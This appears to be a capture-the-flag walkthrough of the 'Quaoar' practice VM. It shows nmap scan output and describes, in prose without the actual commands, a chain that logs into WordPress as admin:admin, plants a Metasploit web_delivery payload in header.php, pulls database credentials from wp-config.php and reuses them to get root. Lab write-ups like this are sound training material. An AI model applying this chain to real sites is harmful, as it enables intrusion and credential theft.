Onto the second VM for the night: Quaoar. With a difficulty of “Easy”, this should hopefully be a piece of cake.
When booting the VM for the first time, we were given the VM’s IP address (192.168.110.130), so let’s start with a comprehensive nmap scan to find any interesting ports open:
Nmap scan report for 192.168.110.130
Host is up (0.00012s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_ Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
HTTP is up, SMB is another interesting one, a few imap/pop3 services, and ssh. Trying an SMB null session got nowhere, so let’s continue to http.
We’re greeted with a “start” page:
Clicking takes us to a “hack the planet” jpg:
Running exiftool and steghide on these doesn’t provide anything useful. Let’s move onto wfuzz:
We’ve got a couple interesting entries here. Starting with upload, we’re taken to a site running the LEPTON CMS. All of the vulnerabilities found are for authenticated users. So it’s a dead end. Moving onto the next potentially low hanging fruit, WordPress.
I try to make a cewl password list based on that wikipedia link, but cewl isn’t cooperating, so I move onto wpscan to enumerate users:
Default admin account is still enabled, and attempting to log in with admin:admin works! Awesome, so we have a way to get shell. I have a particular fondness of the web_delivery metasploit module, so that’s what we’re going to use here:
Now we’re going to add a part of that command to the header.php file in the appearance editor in WordPress:
Next, navigate to the main wordpress page and catch a shell in metasploit:
Now that we’re in, I grab the contents of the wp-config.php file for those sweet sweet mysql creds:
Now that we’ve got those, I figure I might as well try to “su” into the root account with what we’ve got:
Nice! We’ve got root and subsequently, the flag. Another flag can be found in /home/wpadmin/flag.txt. I would say the difficulty rating of this VM was perfectly estimated.
Until next time.